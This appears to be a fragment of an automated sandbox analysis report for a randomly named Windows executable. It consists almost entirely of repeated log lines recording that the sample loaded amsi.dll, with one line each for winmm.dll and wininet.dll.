                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeSection loaded: amsi.dllJump to behavior
